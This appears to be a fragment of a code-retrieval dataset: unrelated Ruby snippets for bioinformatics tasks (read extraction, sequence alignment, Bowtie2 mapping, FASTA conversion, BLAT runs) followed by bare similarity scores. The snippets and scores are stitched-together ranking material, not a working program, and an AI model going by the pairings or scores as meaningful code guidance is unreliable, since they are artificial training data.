"def setup\n @gbif = Pathname.new(__FILE__).dirname.join('gbif_genbank_linker_test.gbif.txt')\n @genbank = Pathname.new(__FILE__).dirname.join('gbif_genbank_linker_test.genbank.txt')\n\n # the sample gbif test file above has these accessions:\n @gbif_accessions = %w(\n 80720161\n AY099992\n AY099996\n AY099996\n AY100002\n AY100003\n AY308770\n AY308771\n AY308771\n AY308773\n AY308778\n )\n\n # the example genbank file has these:\n @genbank_accessions = %w(\n AY099992\n AY099996\n AY308768\n AY308769\n AY308770\n AY308771\n AY308772\n AY308773\n )\n\n # tests that rely on the actual downloads will be skipped unless these are\n # manually supplied\n # TODO: add how we get this\n @gbif_all = Rails.root.join('test/data/pipeline/input/0147211-200613084148143.filtered.txt.expanded')\n end",
"def run(options, argv)\n pooled_reads_filename = 'pooled_sampled_reads.fasta' #TODO: remove this constant into a tempfile or something.\n if options[:already_patterned_reads] #If skipping read extraction\n pooled_reads_filename = options[:already_patterned_reads]\n\n else\n # Parse pattern from cmdline\n desired_pattern = KmerAbundancePattern.new\n desired_pattern.parse_from_human(options[:pattern])\n if options[:reads_files].length != desired_pattern.length\n raise \"Number of entries in the pattern #{desired_pattern.length} and number of reads files #{options[:reads].length} not equivalent!\"\n end\n\n # Collect the kmers that will be used to find trusted reads i.e.\n # Go through each line of the kmer abundance file, looking for kmers that suit the pattern\n input_file = File.open options[:kmer_multiple_abundance_file]\n csv = CSV.new(input_file, :col_sep => ' ')\n\n whitelist_kmers = []\n blacklist_kmers = []\n csv.each do |row|\n max_i = row.length - 2 if max_i.nil?\n\n kmer = row[0]\n counts = row[1...row.length].collect{|s| s.to_i}\n this_pattern = []\n counts.each_with_index do |count, i|\n if count > options[:upper_threshold]\n this_pattern[i] = true\n elsif count < options[:lower_threshold]\n this_pattern[i] = false\n else\n # coverage was in no man's land between thresholds.\n # Ignore this kmer as noise.\n this_pattern[i] = '-'\n end\n end\n #log.debug \"Found pattern #{this_pattern} from kmer #{kmer}, which has abundances #{counts}\" if log.debug?\n\n if desired_pattern.consistent_with? this_pattern\n whitelist_kmers.push row[0]\n else\n # kmer is not present when it should be\n blacklist_kmers.push row[0]\n end\n end\n log.info \"After parsing the kmer multiple abundance file, found #{whitelist_kmers.length} kmers that matched the pattern, and #{blacklist_kmers.length} that didn't\"\n unless whitelist_kmers.length > 0\n log.error \"No kmers found that satisfy the given pattern, exiting..\"\n exit 1\n end\n\n\n #outdir = options[:output_directory]\n #Dir.mkdir outdir unless Dir.exist?(outdir)\n\n # grep the pattern out from the raw reads, subsampling so as to not overwhelm the assembler\n #Tempfile.open('whitelist') do |white|\n File.open 'whitelist', 'w' do |white| #TODO: remove 'whitelist' file as a constant\n white.puts whitelist_kmers.join(\"\\n\")\n white.close\n\n #Tempfile.open('blacklist') do |black|\n File.open('black','w') do |black|\n black.puts blacklist_kmers.join(\"\\n\")\n black.close\n\n threadpool = []\n sampled_read_files = []\n log.info \"Extracting reads that contain suitable kmers\"\n options[:reads_files].each_with_index do |file, i|\n next unless desired_pattern[i] #Don't extract reads from reads where those reads should not have been amplified\n\n sampled = File.basename(file)+'.sampled_reads.fasta'\n sampled_read_files.push sampled\n\n grep_path = \"#{ ENV['HOME'] }/git/priner/bin/read_selection_by_kmer \" #TODO: this won't work on other people's systems.\n if options[:min_leftover_length]\n grep_path += \"--min-leftover-length #{options[:min_leftover_length]} \"\n end\n thr = Thread.new do\n grep_cmd = \"#{grep_path} --whitelist #{white.path} --blacklist #{black.path} --reads #{file} --kmer-coverage-target #{options[:kmer_coverage_target]} > #{sampled}\"\n log.debug \"Running cmd: #{grep_cmd}\"\n status, stdout, stderr = systemu grep_cmd\n log.debug stderr\n\n raise unless status.exitstatus == 0\n log.debug \"Finished extracting reads from #{file}\"\n end\n threadpool.push thr\n end\n threadpool.each do |thread| thread.join; end #wait until 
everything is finito\n\n log.info \"Finished extracting reads for sampling. Now pooling sampled reads\"\n pool_cmd = \"cat #{sampled_read_files.join ' '} >#{pooled_reads_filename}\"\n log.debug \"Running cmd: #{pool_cmd}\"\n status, stdout, stderr = systemu pool_cmd\n raise stderr if stderr != ''\n raise unless status.exitstatus == 0\n end\n end\n end\n\n log.info \"Extracting dummy reads from the ends of contigs to use as anchors\"\n start_contig = options[:start_contig]\n end_contig = options[:end_contig]\n if [start_contig.length, end_contig.length].min < 2*options[:contig_end_length]\n log.warn \"Choice of initial/terminal nodes to perform graph search with may not be optimal due to the small contig size\"\n end\n if [start_contig.length, end_contig.length].min < options[:contig_end_length]\n log.error \"At least one contig too small to proceed with current code base, need to fix the code to allow such a small contig\"\n exit 1\n end\n\n probe_sequences = [\n start_contig[start_contig.length-options[:contig_end_length]...start_contig.length],\n Bio::Sequence::NA.new(end_contig[0...options[:contig_end_length]]).reverse_complement.to_s\n ]\n read_input = Bio::FinishM::ReadInput.new\n read_input.fasta_singles = [pooled_reads_filename]\n finishm_graph = Bio::FinishM::GraphGenerator.new.generate_graph(probe_sequences, read_input, options)\n graph = finishm_graph.graph\n start_node = finishm_graph.probe_nodes[0]\n start_node_forward = finishm_graph.probe_node_directions[0]\n end_node = finishm_graph.probe_nodes[1]\n end_node_forward = finishm_graph.probe_node_directions[1]\n\n log.info \"Node(s) found that are suitable as initial and terminal nodes in the graph search, respectively: #{start_node.node_id} and #{end_node.node_id}\"\n\n log.info \"Removing nodes unconnected to either the start or the end from the graph..\"\n original_num_nodes = graph.nodes.length\n original_num_arcs = graph.arcs.length\n filter = Bio::AssemblyGraphAlgorithms::ConnectivityBasedGraphFilter.new\n filter.remove_unconnected_nodes(graph, [start_node, end_node])\n log.info \"Removed #{original_num_nodes-graph.nodes.length} nodes and #{original_num_arcs-graph.arcs.length} arcs\"\n\n if options[:output_graph_png] or options[:output_graph_svg] or options[:output_graph_dot]\n viser = Bio::Assembly::ABVisualiser.new\n log.info \"Preparing GraphViz object for output\"\n gv = viser.graphviz(graph, {:start_node_id => start_node.node_id, :end_node_id => end_node.node_id})\n\n if options[:output_graph_png]\n log.info \"Converting assembly to a graphviz PNG #{options[:output_graph_png] }\"\n gv.output :png => options[:output_graph_png], :use => :neato\n end\n if options[:output_graph_svg]\n log.info \"Converting assembly to a graphviz SVG #{options[:output_graph_svg] }\"\n gv.output :svg => options[:output_graph_svg], :use => :neato\n end\n if options[:output_graph_dot]\n log.info \"Converting assembly to a graphviz DOT #{options[:output_graph_dot] }\"\n gv.output :dot => options[:output_graph_dot]\n end\n end\n\n log.info \"Searching for trails between the initial and terminal nodes, within the assembly graph\"\n cartographer = Bio::AssemblyGraphAlgorithms::AcyclicConnectionFinder.new\n #raise \"Untested connection finder below\"\n #trails = cartographer.find_all_trails_between_nodes(graph, start_node, end_node, options[:graph_search_leash_length], start_node_forward)\n trails = cartographer.find_trails_between_nodes(graph, start_node, end_node, options[:graph_search_leash_length], start_node_forward)\n log.info \"Found 
#{trails.length} trail(s) between the initial and terminal nodes\"\n\n# log.info \"Reading kmer abundances from #{options[:kmer_multiple_abundance_file]}..\"\n# kmer_hash = Bio::KmerMultipleAbundanceHash.parse_from_file options[:kmer_multiple_abundance_file]\n# log.info \"Finished reading the kmer abundances\"\n\n# if options[:trail_kmer_coverage_file]\n# log.info \"Writing out kmer coverages to #{options[:trail_kmer_coverage_file]}..\"\n# writer = Bio::AssemblyGraphAlgorithms::KmerCoverageWriter.new\n# io = File.open(options[:trail_kmer_coverage_file],'w')\n# writer.write(io, trails, kmer_hash)\n# log.info \"Finished writing\"\n# end\n\n# log.info \"Filtering trail(s) based on kmer coverage, requiring each kmer in the path to have a minimum of #{options[:kmer_path_filter_min_coverage]} coverage in patterned reads, except for the #{options[:kmer_path_end_exclusion_length]}bp at the ends\"\n# kmer_path_filter = Bio::AssemblyGraphAlgorithms::KmerCoverageBasedPathFilter.new\n# thresholds = desired_pattern.collect{|c| c == true ? 1 : 0}\n# log.info \"Using thresholds for filtering: #{thresholds}\"\n# trails = kmer_path_filter.filter(trails, kmer_hash, thresholds, :exclude_ending_length => options[:kmer_path_end_exclusion_length])\n# log.info \"After filtering remained #{trails.length} trails\"\n\n printer = Bio::AssemblyGraphAlgorithms::ContigPrinter.new\n trails.each_with_index do |trail, i|\n log.debug \"Before attachment to the contig, sequence of the trail was #{trail.sequence}\" if log.debug?\n acon = Bio::AssemblyGraphAlgorithms::ContigPrinter::AnchoredConnection.new\n acon.start_probe_read_id = 1\n acon.end_probe_read_id = 2\n acon.start_probe_node = start_node\n acon.end_probe_node = end_node\n acon.start_probe_contig_offset = options[:contig_end_length]\n acon.end_probe_contig_offset = options[:contig_end_length]\n acon.paths = [trail]\n log.debug \"AnchoredConnection object to print for this trail: #{acon.inspect}\" if log.debug?\n\n puts \">trail#{i+1}\"\n puts printer.one_connection_between_two_contigs(\n finishm_graph.graph,\n probe_sequences[0],\n acon,\n probe_sequences[1])\n end\n end",
"def cleanup_distances!\n r = get_result(:distances)\n ref = project.datasets.select(&:ref?).select(&:active?).map(&:name)\n return if r.nil?\n\n %i[haai_db aai_db ani_db].each do |db_type|\n db = r.file_path(db_type)\n next if db.nil? || !File.size?(db)\n\n sqlite_db = SQLite3::Database.new db\n table = db_type[-6..-4]\n val = sqlite_db.execute \"select seq2 from #{table}\"\n next if val.empty?\n\n (val.map(&:first) - ref).each do |extra|\n sqlite_db.execute \"delete from #{table} where seq2=?\", extra\n end\n end\n end",
"def test_match_reference\n parser = CEdictParser.new(Rails.root.join(\"data/cedict/test_data/cedict_parser_match_reference.txt\").to_s)\n entries = parser.run\n assert_equal(6,entries.count)\n assert_equal(1,parser.reference_only_entries.count)\n \n merged_entries = parser.merge_references_into_base_entries(entries,parser.reference_only_entries)\n assert_equal(6,merged_entries.count)\n end",
"def alignment_strings(start=0,stop=self.length,organisms=nil) \n answer = Array.new \n self.genomic_aligns.each do |contig|\n if organisms.nil? # if no organisms were specified to limit the results\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name)) unless sequence.nil?\n else\n if organisms.include?(contig.find_organism)\n sequence = contig.aligned_sequence(start,stop)\n answer << Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(contig.find_organism.name))\n end\n end \n end\n return answer \n end",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def phylipstring_to_fastastring(phystr)\n ph=Bio::Phylip::PhylipFormat.new(phystr)\n return ph.alignment.output(:fasta) #output_fasta\n\n end",
"def initialize(seq_name,seq_fasta,seq_qual, seq_comment = '')\n super\n\n @actions = []\n @seq_fasta_orig = seq_fasta\n @seq_fasta = seq_fasta\n \n @seq_qual_orig = seq_qual\n @seq_qual = seq_qual \n \n @insert_start = 0\n @insert_end = seq_fasta.length-1 \n \n @stats={}\n @comments=[]\n \n @file_tags=[]\n \n # for paired ends\n @order_in_tuple=0\n @tuple_id=0\n @tuple_size=0\n @file_tag_tuple_priority=0\n \n end",
"def obtain_target_from_seq(bioseq_seq)\r\n #we are going to keep all the targets from each gene,\r\n #hash of hashes :)\r\n targets=Hash.new\r\n len_bioseq = bioseq_seq.length + 1\r\n nstrand_targets = []\r\n pstrand_targets = []\r\n for i in (0..bioseq_seq.length-5)\r\n if bioseq_seq.complement[i..i+5] == \"cttctt\"\r\n nstrand_targets << [i,i+5]\r\n end\r\n if bioseq_seq[i..i+5] == \"cttctt\"\r\n pstrand_targets << [i,i+5]\r\n end\r\n end\r\n #im going to obtein the exon sites\r\n bioseq_seq.features.each do |feature|\r\n position = feature.position\r\n #not remote entries\r\n next unless (feature.feature == 'exon' ) && (not position =~ /[A-Z]/)\r\n exon_id = feature.qualifiers[0].value.gsub('exon_id=', '')\r\n #we can find exons in the the complement or the postive strand, so the way for obtaining the data is different\r\n #i wanna keep the strand forward or reverse\r\n if position =~/complement/\r\n exon_site_negative=position.tr('complement()',\"\")\r\n aux=exon_site_negative =~ /\\./ \r\n #we have to change the start and final point, the ebi documentation shows --> x..y, y is the start point and x is the final point\r\n #location 1 --> l1 \r\n #location 2 --> l2\r\n l1= len_bioseq - exon_site_negative[0,aux].to_i\r\n l2= len_bioseq - exon_site_negative[aux+2,exon_site_negative.length].to_i\r\n exon_site_negative=[l2,l1] # they are the location of the exons\r\n #we are going to check if the target that we did before is in the exon site\r\n is_inside_exon = check_target_in_exon(exon_id,nstrand_targets,'reverse',len_bioseq,exon_site_negative)\r\n #is_inside_exon will be a hash with positions, exon_id and the strand for the gff file\r\n unless is_inside_exon.nil? #if the hash is not nil i could keep it in other hash\r\n targets = targets.merge(is_inside_exon)\r\n end\r\n else\r\n exon_site_positive=position\r\n aux=exon_site_positive =~ /\\./ \r\n l1= exon_site_positive[0,aux].to_i\r\n l2= exon_site_positive[aux+2,exon_site_positive.length].to_i\r\n exon_site_positive=[l1,l2]\r\n is_inside_exon = check_target_in_exon(exon_id,pstrand_targets,'forward',len_bioseq,exon_site_positive)\r\n #is_inside_exon will be a hash with positions, exon_id and the strand for the gff file\r\n unless is_inside_exon.nil? #if the hash is not nil i could keep it in other hash\r\n targets = targets.merge(is_inside_exon)\r\n end\r\n end\r\n end\r\n return targets\r\nend",
"def run_score\n filename = self.generate_fasta_alignment_file\n string = \"./lib/score_mac #{filename} temp_data/#{self.alignment_name}_res.txt temp_data/#{self.alignment_name}_dif.txt temp_data/#{self.alignment_name}_alignments.txt\"\n puts string\n if system(string)\n \n end\n end",
"def genome_from_path(kmers_a)\n <<-DOC\n String Spelled by a Genome Path Problem. Reconstruct a string from its genome path.\n Input: A sequence of k-mers Pattern1, … ,Patternn such that the last k - 1 symbols of Patterni are\n equal to the first k-1 symbols of Patterni+1 for 1 ≤ i ≤ n-1.\n Output: A string Text of length k+n-1 such that the i-th k-mer in Text is equal to Patterni (for 1 ≤ i ≤ n). \n \n Input: [\"TAA\", \"AAT\", \"ATG\"]\n Output: TAATG\n DOC\n # If we assign the first kmer to the genome and keep on adding the last character from all the next kmers we\n # should get the string\n genome = kmers_a.shift # shift will remove first element from array and returns it\n kmers_a.each do |kmer|\n genome += kmer[-1]\n end\n return genome\n end",
"def find_probes(indexed_bam_file, contig_names_positions_directions, kmer, path_to_cny_unified_seq_names_file)\n # need to check the sequence of the aligned read is the same as what is in the cny_unified_seq_names_file\n end",
"def fetch_unaligned_sequences \n answer = Array.new \n self.genomic_aligns.each do |piece| \n sequence = piece.get_slice.seq\n fas = Bio::FastaFormat.new(Bio::Sequence::NA.new(sequence).to_fasta(piece.genomic_align_id))\n answer.push(fas) \n end \n return answer \n end",
"def bowtie_map1(bowtie_index, input_file, input_format, output_file)\n\t\tif input_format == 'fasta'\n\t\t\tstdin, stdout, stderr, t = Open3.popen3(\"bowtie2 -x #{bowtie_index} -f -U #{input_file} | samtools view -bS - > #{output_file}\")\n\t\telse\n\t\t\tstdin, stdout, stderr, t = Open3.popen3(\"bowtie2 -x #{bowtie_index} -q -U #{input_file} | samtools view -bS - > #{output_file}\")\n\t\tend\n\t\tsystem_exitcode(t, stderr, 'Bowtie2')\n\tend",
"def getFtsLoc\n location = ARGV[1]\n loc = location.split(\"..\")\n protId = \"\"\n @gbkObj.each_cds do |ft|\n ftH = ft.to_hash\n ftloc = ft.locations\n if ftloc[0].from == loc[0].to_i && ftloc[0].to == loc[1].to_i\n gene = []\n product = []\n gene = ftH[\"gene\"] if !ftH[\"gene\"].nil?\n product = ftH[\"product\"] if !ftH[\"product\"].nil?\n protId = ftH[\"protein_id\"][0] if !ftH[\"protein_id\"].nil?\n location = \"c#{location}\" if ftloc[0].strand == -1\n dna = getDna(ft,@gbkObj.to_biosequence)\n seqout = dna.output_fasta(\"#{@accession}|#{location}|#{protId}|#{gene[0]}|#{product[0]}\",60)\n puts seqout\n end\n end\n end",
"def full_ref # rubocop:disable Metrics/AbcSize\n @full_ref ||= begin\n ref = \"#{refparts[:perfix]}#{refparts[:series]} #{refparts[:code]}\"\n ref += \"pt#{refparts[:prt]}\" if refparts[:prt] # long_to_short(refparts, \"prt\").to_s\n ref += \"ver#{refparts[:ver]}\" if refparts[:ver] # long_to_short(refparts, \"vol\").to_s\n ref += \"v#{refparts[:vol]}\" if refparts[:vol]\n ref\n end\n end",
"def fastafile_to_fastastring(filename)\n oa = Bio::Alignment::OriginalAlignment.new()\n #load sequences from file\n Bio::FlatFile.open(Bio::FastaFormat, filename) { |ff|\n #store sequence from file\n ff.each_entry { |x| oa.add_seq(x.seq,x.entry_id) }\n }\n return oa.output(:fasta)\n\n end",
"def configure_ait_files(opts, outdir, basename, overwrite = true)\n opts.ais_file = File.join(outdir, \"#{basename}.ais\") unless (!overwrite && opts.ais_file)\n opts.apx_file = File.join(outdir, \"#{basename}.apx\") unless (!overwrite && opts.apx_file)\n opts.ait_report_prefix = File.join(outdir, \"#{basename}.ait\") unless (!overwrite && opts.ait_report_prefix)\n end"
] |
[
"0.5709553",
"0.5528572",
"0.54516274",
"0.5200783",
"0.51840615",
"0.5138118",
"0.50645435",
"0.49660274",
"0.49483785",
"0.4883737",
"0.4859847",
"0.48551404",
"0.483638",
"0.48274213",
"0.48274213",
"0.4795258",
"0.47941756",
"0.47817165",
"0.47717196",
"0.47586805",
"0.47520122",
"0.47222647",
"0.47182214",
"0.47016332",
"0.46906725",
"0.465728",
"0.4655251",
"0.46336532",
"0.46320567",
"0.45995995",
"0.45899546",
"0.45894632",
"0.45891798",
"0.45884538",
"0.45767465",
"0.455392",
"0.45505938",
"0.45490134",
"0.4528653",
"0.44981432",
"0.44944483",
"0.44931188",
"0.44728354",
"0.4470433",
"0.4470433",
"0.44606498",
"0.4458022",
"0.44564378",
"0.4451278",
"0.4447133",
"0.44364277",
"0.44345927",
"0.44256362",
"0.44127494",
"0.44116235",
"0.44082177",
"0.43828672",
"0.4352269",
"0.43313202",
"0.43293563",
"0.43262148",
"0.4309739",
"0.43086615",
"0.43072268",
"0.4286442",
"0.42857653",
"0.428278",
"0.42762342",
"0.42666113",
"0.4255603",
"0.42349142",
"0.42328137",
"0.42106482",
"0.42013866",
"0.41942203",
"0.4187699",
"0.41876844",
"0.41835877",
"0.41709915",
"0.41585913",
"0.41578072",
"0.41520926",
"0.41367128",
"0.41289008",
"0.41169852",
"0.41144508",
"0.41055977",
"0.41055113",
"0.41045964",
"0.40800577",
"0.4079905",
"0.40762144",
"0.40757382",
"0.40755254",
"0.40736452",
"0.40707695",
"0.406904",
"0.40625408",
"0.40461174",
"0.40405852"
] |
0.7185728
|
0
|
Performs alignment to the ncRNA reference; only unaligned reads will be processed further
|
def compute
  # Build the aligner index over the ncRNA reference, then align the
  # trimmed reads; only the reads left unaligned here are processed further.
  index(@ref, @ref_base, @software)
  align(@ref, @ref_base, @software, {seedlen: @seedlen})
end
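A minimal sketch of the idea this record's query describes, assuming a bowtie2-style aligner: reads are mapped against the ncRNA reference, and bowtie2's --un option writes out the reads that failed to align, which are exactly the reads kept for downstream processing. The class, method, and file names below are illustrative, not part of the original pipeline (the real align helper, visible among the negatives further down, supports several aligners and many more options).

    require 'open3'

    # Illustrative ncRNA pre-filter, mirroring the index-then-align flow of
    # compute above. Assumes bowtie2/bowtie2-build are on PATH; all names
    # here are hypothetical.
    class NcrnaFilter
      def initialize(ref_fasta, ref_base, seedlen: 20)
        @ref = ref_fasta      # ncRNA reference FASTA
        @ref_base = ref_base  # basename for the bowtie2 index
        @seedlen = seedlen    # seed length passed to bowtie2's -L
      end

      # Build the bowtie2 index once (the index step).
      def index
        run("bowtie2-build #{@ref} #{@ref_base}")
      end

      # Align trimmed reads; reads that do not align to the ncRNA reference
      # are written to unaligned_fq and are the ones processed further.
      def align(trimmed_fq, unaligned_fq, ncrna_sam)
        run("bowtie2 --un #{unaligned_fq} -x #{@ref_base} " \
            "-L #{@seedlen} -U #{trimmed_fq} -S #{ncrna_sam}")
        unaligned_fq
      end

      private

      def run(cmd)
        _out, err, status = Open3.capture3(cmd)
        raise "command failed: #{cmd}\n#{err}" unless status.success?
      end
    end

Usage under those assumptions: filter = NcrnaFilter.new('ncrna.fa', 'ncrna_idx'); filter.index; filter.align('reads.trim.fq', 'reads.unaligned.fq', 'ncrna_hits.sam') returns the path of the unaligned-reads file.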
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
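The objective block above declares how a record like this is consumed: self and paired are empty, and the triplet entry names the three fields (query, document, negatives) that form (anchor, positive, negative) training examples. A hypothetical sketch of expanding one record into such triplets under that interpretation (the Record struct and the truncated field values are illustrative, not part of the dataset):

    # Hypothetical loader: one (query, document, negative) triplet per negative.
    Record = Struct.new(:query, :document, :negatives, keyword_init: true)

    def triplets(record)
      record.negatives.map { |neg| [record.query, record.document, neg] }
    end

    record = Record.new(
      query: 'Performs alignment to the ncRNA reference; ...',
      document: "def compute\n  ...\nend",
      negatives: ['def process_alignment ...', 'def align! ...']
    )
    triplets(record).size  # => 2, one triplet per negative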
|
[
"def process_alignment\n # init vars\n @names = []\n @seqs = []\n \n @alignment = \"-B #{@basename}.aln\"\n\n # import alignment file\n @content = IO.readlines(@infile).map {|line| line.chomp}\n \n #check alignment for gap-only columns\n remove_inserts\n \n #write query-file\n File.open(@infile, \"w\") do |file|\n file.write(\">#{@names[0]}\\n\")\n file.write(\"#{@seqs[0]}\\n\")\n end\n \n #write aln-file\n File.open(@basename + \".aln\", \"w\") do |file|\n @names.each_index do |num|\n file.write(\"Sequence#{num} \")\n file.write(\" \") if (num < 10)\n file.write(\" \") if (num < 100)\n file.write(\"#{@seqs[num]}\\n\")\n end\n end\n end",
"def align!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 32 )\n\n type = ALIGN\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 362:8: 'align'\n match( \"align\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 32 )\n\n end",
"def align(ref, ref_base, software, opts = {})\n if software == :tophat\n bt_flag =\n opts[:tophat_aligner] == :bowtie1 ? '--bowtie1' : ''\n gap_flag =\n opts[:mismatches] < 2 ? \"--read-gap-length #{opts[:mismatches]}\" : ''\n end\n\n aln_cmd = {\n bowtie1:\n 'bowtie' \\\n \" --seedlen=#{opts[:seedlen]} #{ref_base}\" \\\n \" --un=#{@names.get('fp')}\" \\\n \" -q #{@names.get('trim')} \" \\\n \" --sam #{@names.get('ncrna')}\",\n bowtie2:\n 'bowtie2' \\\n \" --un #{@names.get('fp')}\" \\\n \" -x #{ref_base}\" \\\n \" -L #{opts[:seedlen]}\" \\\n \" -U #{@names.get('trim')}\" \\\n \" -S #{@names.get('ncrna')}\",\n bwa:\n 'bwa mem' \\\n \" -k #{opts[:seedlen]}\" \\\n \" #{ref} \" \\\n \" #{@names.get('trim')} \" \\\n \"| samtools view -b - > #{@names.get('ncrna')} \" \\\n '&& bam2fastq' \\\n \" -o #{@names.get('fp')}\" \\\n \" --no-aligned #{@names.get('ncrna')}\",\n tophat:\n 'tophat' \\\n \" --read-edit-dist #{opts[:mismatches]}\" \\\n \" #{bt_flag}\" \\\n \" -N #{opts[:mismatches]}\" \\\n \" --output-dir #{@names.get('topout')}\" \\\n ' --no-novel-juncs' \\\n \" #{gap_flag}\" \\\n \" --GTF #{opts[:annotation]}\" \\\n \" #{ref_base} #{@names.get('fp')}\",\n star:\n 'STAR' \\\n \" --genomeDir #{ref_base}\" \\\n \" --outFilterMismatchNmax #{opts[:mismatches]}\" \\\n \" --readFilesIn #{@names.get('fp')}\"\\\n \" --outFileNamePrefix #{@names.get('mapped_all')}\"\n }\n\n target =\n opts[:seedlen].nil? ? @names.get('mapped_all') : @names.get('fp')\n run_cmd(aln_cmd[software]) unless skip_step?(target, 'aligning')\n [@names.get('mapped_all'), @names.get('unmapped')]\n end",
"def unbucketized_alignment\n align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: @mismatches\n }\n )\n mapped_all = @software == :star ? \\\n @names.get('mapped_all_star') : @names.get('mapped_all')\n run_cmd(\"cp #{mapped_all} #{@names.get('mapped_merged')}\")\n unless @software == :star\n run_cmd(\n \"cp #{@names.get('unmapped')} #{@names.get('unmapped_merged')}\"\n )\n end\n @max_mismatches = @mismatches\n end",
"def alignment_node(node); end",
"def bucketized_alignment\n # split reads into buckets according to their size and err_rate\n @buckets = bucketize(@err_rate)\n\n # perform alignment on each bucket\n @buckets.reverse_each do |lower, upper, mismatches|\n @names.set_bucket(lower, upper)\n mapped, unmapped = align(\n @ref, @ref_base, @software,\n { annotation: @annotation,\n tophat_aligner: @tophat_aligner,\n mismatches: mismatches\n }\n )\n @mapped_bams << mapped\n @unmapped_bams << unmapped\n @max_mismatches = [@max_mismatches, mismatches].max\n end\n\n # merge alignments\n @names.unset_bucket\n unbucketize(@mapped_bams, @names.get('mapped_merged'))\n unbucketize(@unmapped_bams, @names.get('unmapped_merged'))\n end",
"def convert_alignment(args={})\n i, o = args[:in], args[:out]\n \n ff = Bio::FlatFile.auto(i).to_a\n aln = Bio::Alignment.new(ff)\n File.open(o, 'w') do |o|\n o.write aln.output :phylip\n end\n \nend",
"def run_align_assess\n filename = self.generate_fasta_alignment_file_for_all\n string = \"./lib/AlignAssess_wShorterID #{filename} P\"\n seq_array = Array.new\n if system(string)\n seq_id_array = self.sequences.map{|s| s.seq_id}\n new_filename = filename + \"_assess\"\n f = File.new(new_filename, \"r\")\n flag = false\n read_row= 999999999\n cur_row = 0\n while (line = f.gets)\n if cur_row > read_row && flag\n if line == \"\\n\"\n flag =false\n else\n seq_array << line.split(\"\\t\")\n end\n elsif line == \"Pair-wise %ID over shorter sequence:\\n\"\n flag=true\n read_row = cur_row + 2\n end\n cur_row +=1\n end\n range = seq_array.length - 1\n #seq_array.each do |row|\n for row_num in 0..range\n for i in 1..range#(row_num) \n PercentIdentity.first_or_create(:seq1_id=>seq_id_array[row_num],\n :seq2_id=>seq_id_array[i],\n :alignment_name => self.alignment_name,\n :percent_id=>seq_array[row_num][i])\n # print \"[#{row_num}:#{i-1}=>#{row[i]}],\"\n end\n #print \"\\n\"\n end\n end\n end",
"def aligned_sequence(start=0,stop = nil,noindent=false) \n self._get_aligned_sequence_from_original_sequence_and_cigar_line\n #seq = AlignSeq.new(self.get_slice.seq,self.cigar_line,start,stop).align\n #return Bio::FastaFormat.new(Bio::Sequence::NA.new(seq).to_fasta(\"#{self.find_organism}\"))\n end",
"def align\n @genome = Genome.find(params[:id])\n @proteins = Protein.all\n @method = params[:method]\n\n if params[:method] == 'local'\n @message = 'Local alignment'\n align_all_local\n elsif params[:method] == 'global'\n @message = 'Global alignment'\n align_all_global\n end\n\n end",
"def align\n unless defined?(@align); parse_align; end\n @align\n end",
"def align\n unless defined?(@align); parse_align; end\n @align\n end",
"def aligned_sequence \n peptide_member = Ensembl::Compara::Member.find_by_member_id(self.peptide_member_id)\n seq = peptide_member.sequence.sequence\n return nil if seq.nil?\n aln = Ensembl::Compara::AlignSeq.new(seq,self.cigar_line).align\n return Bio::FastaFormat.new(Bio::Sequence::NA.new(aln).to_fasta(\"#{self.member.stable_id}|#{peptide_member.stable_id}\")) \n end",
"def query_align(seqs)\n seqtype = nil\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs)\n end\n seqs.each do |s|\n if s.is_a?(Bio::Sequence::AA) then\n seqtype = 'PROTEIN'\n elsif s.is_a?(Bio::Sequence::NA) then\n seqtype = 'DNA'\n end\n break if seqtype\n end\n query_string(seqs.to_fasta(70, :avoid_same_name => true), seqtype)\n end",
"def align_pairwise(bioseqs, opt={})\n factory = Bio::ClustalW.new\n clustal_opts = hash_opts_to_clustalopts(opt)\n factory.options = clustal_opts\n template = bioseqs.shift\n start_length = []\n pairwise_aligns = bioseqs.map do |bseq|\n clust_al = clustal_align([template, bseq], factory)\n cl_cons = clust_al.consensus\n aligned_string = clust_al[1].to_s\n #(st, len) = find_good_section(aligned_string, opt[:fidelity_length])\n seq_to_use = \n if opt[:consensus_fidelity]\n cl_cons\n else\n aligned_string\n end\n (st, len) = find_good_section(seq_to_use, opt[:fidelity_length])\n if st\n pristine = aligned_string[st, len].gsub('-','') # pristine read (ends removed)\n clustal_align([template.to_s, Bio::Sequence::NA.new(pristine)], factory)\n else\n warn \"a sequence does not meeting min fidelity! using original alignment\" \n clust_al\n end\n\n end\n end",
"def query_align(seqs, *arg)\n unless seqs.is_a?(Bio::Alignment)\n seqs = Bio::Alignment.new(seqs, *arg)\n end\n query_string(seqs.to_fasta(70))\n end",
"def sub_alignment _value=0\n send_cmd(\"sub_alignment #{_value}\")\n end",
"def align\n [:owner, :group, :size].each do |field|\n current = @alignment[field]\n @buffer.each do |line|\n new = line[field].length\n current = new if current < new\n end\n @alignment[field] = current\n end\n end",
"def generate_alignment\n raise ArgumentError, 'Missing genome FASTA file.' unless @genome_file\n raise ArgumentError, 'Missing transcripts FASTA file.' unless @transcripts_file\n \n # Prepare the BLAT alignment\n blat = Alignment::BLAT.new(@blat_options.merge({ out_format: :tab, database: @genome_file }))\n \n # Optionally set a permanent file to write the results to\n @alignment_file ||= \"#{@transcripts_file}.alignment\"\n blat.output_file = @alignment_file\n \n puts \"Running BLAT alignment...\" if @verbose\n \n # Run\n result_file = blat.run(@transcripts_file)\n result_file.path\n end",
